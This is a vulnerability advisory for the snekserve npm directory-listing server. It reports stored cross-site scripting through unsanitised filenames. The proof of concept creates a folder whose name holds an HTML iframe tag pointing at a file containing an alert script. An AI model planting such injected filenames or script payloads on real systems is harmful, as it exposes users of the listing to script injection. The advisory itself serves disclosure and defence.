snekserve

vulnerability stored cross-site scripting (xss)
severity 7.2
language javascript
registry npm

Description

The snekserve project is a directory listing server which is vulnerable against stored XSS because the filename isn't checked correctly, leading to HTML/JS injection

POC

  1. Create a PoC file like this:
<!-- malicious.html -->
<script>alert(document.domain)</script>
  1. Run the following commands: npm i snekserve -g # Installs the CLI version of the module
  2. mkdir '<iframe src=..\malicious.html>' # Creates the malicious *HTML formatted* folder
  3. snekserve # Starts the server
  4. Open a browser and go on http://localhost:8080
  5. XSS triggered

Notes: The attack can work even if the malicious file isn't inside the server it-self, and while the attacker needs a limited access to the system to create a new malicious filename, it could be possible when it's used among other ECM softwares.